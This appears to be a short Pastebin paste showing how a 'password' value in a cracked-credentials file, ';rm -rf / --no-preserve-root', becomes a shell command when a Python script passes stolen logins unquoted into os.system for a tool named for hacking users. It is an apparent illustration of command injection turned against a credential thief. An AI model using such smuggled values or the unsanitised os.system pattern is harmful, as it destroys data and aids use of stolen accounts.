Advertisement
Guest User

Untitled

a guest
Mar 2nd, 2019
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. # ./hack_user_with_password_i_just_stole --user you@example.com --password rm -rf / --no-preserve-root
  2. # ./hack_user_with_password_i_just_stole --user you@example.com --password "rm -rf / --no-preserve-root"
  3.  
  4. # ./hack_user_with_password_i_just_stole --user you@example.com --password ;rm -rf / --no-preserve-root
  5. # ./hack_user_with_password_i_just_stole --user you@example.com --password ";rm -rf / --no-preserve-root"
  6.  
  7. user@example.com,password1234
  8. <snip>
  9. you@example.com,;rm -rf / --no-preserve-root
  10. <snip>
  11.  
  12. #!/usr/bin/env python3
  13.  
  14. import os
  15.  
  16. with open('cracked_passwords.txt') as f:
  17. for line in f:
  18. user, password = line.split(',')
  19. os.system("./hack_user_with_password_i_just_stole --user {} --password {}".format(user, password)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement